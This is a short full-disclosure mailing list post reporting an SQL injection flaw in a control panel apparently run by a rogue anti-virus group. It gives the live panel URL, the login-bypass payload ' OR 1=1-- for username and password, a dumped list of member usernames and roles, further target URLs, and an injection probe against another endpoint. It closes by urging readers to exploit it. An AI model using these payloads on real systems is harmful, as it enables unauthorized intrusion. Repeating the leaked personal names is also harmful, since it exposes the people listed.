Dear Full-Disclosure, Since F-Secure, Kaspersky, Symantec, SecurityFocus and Secunia apparently don't care about fake anti-virus authors, I'm giving you this awesome, yet simple flaw that will give you access to their main control panel. ======== !background ======== I originally found this while doing some very basic reversing of the hoax antivirus called MalwareRemovalBot. ======== !stuff ======== The affiliate group that controls many rogue anti-malware software has a SQL injection vulnerability in their control panel that hosts all their sites. This control panel, is also hosted on a domain that is controlled by the rogue group. On the control panel, resides a user list, malware search, definition search, settings, statistics, archives, various databases, and TODO lists. The group is frequently featured on the F-Secure Weblog at http://www.f-secure.com/weblog Details follow below: The main control panel for the group: http://spywaredb3.2squared.com With the 'trivial' SQL injection flaw: Username: ' OR 1=1-- Password: ' OR 1=1-- User List: http://spywaredb3.2squared.com/members/list admin admin chris admin nav admin bob admin mike admin support researcher suresh researcher Bhawesh researcher support21 researcher meredith describer rob describer jamie describer Kumar limited limited limited limited2 limited Mathew limited lenart researcher Venkatesh researcher Parvez researcher andrea describer moses research_marketer aveen researcher tmarket marketer sarab marketer lizc marketer trm research_marketer Plato researcher siva researcher arvind researcher padmanabhan researcher Vivekanandan researcher Rajesh researcher Arun researcher Other sites you might be interested in: http://privacycontrol.com/members/index.php http://errorsmart.com/ http://www.malwareremovalbot.com/members/index.php http://rpc.2squared.com/driver_data/post.php?postHardware=-2&Settings= http://spywaredb3.2squared.com/update/info There are also other PHP flaws that were on the 2squared.com domain, however, I could not exploit them. Such as this: http://rpc.2squared.com/manualdb.php?productName=-9+ORDER+BY+20-- ======== !end ======== Have fun eXpl0iting, Xia Shing Zee Sad nobody gives a shit when somebody could actually take this shit down, legitimately.